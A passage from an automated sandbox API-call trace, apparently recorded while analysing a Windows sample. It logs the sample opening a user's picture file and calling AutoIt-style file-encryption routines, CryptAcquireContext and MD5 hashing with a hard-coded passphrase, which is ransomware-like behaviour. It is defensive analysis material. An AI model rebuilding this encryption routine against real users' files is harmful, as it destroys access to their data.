lpMultiByteStr=0x43ca220, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0088.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.471] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0088.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0088.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0088.472] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\h5_zfay-6stnb.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0088.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0088.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0088.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.474] FreeLibrary (hLibModule=0x772d0000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.475] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.475] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0088.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.476] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0088.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0088.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0088.478] CloseHandle (hObject=0x258) returned 1 [0088.478] FreeLibrary (hLibModule=0x772d0000) returned 1 [0088.478] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0088.478] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed3ce30, ftCreationTime.dwHighDateTime=0x1d5ee91, ftLastAccessTime.dwLowDateTime=0xefa98900, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xefa98900, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x1880d, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="h5_ZfAY-6STnb.gif", cAlternateFileName="H5_ZFA~1.GIF")) returned 0x41ac540 [0088.478] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0088.478] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0088.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0088.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0088.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0088.479] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0088.480] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0088.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.480] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0088.480] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.480] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.520] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca730, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0088.521] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0088.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0088.521] 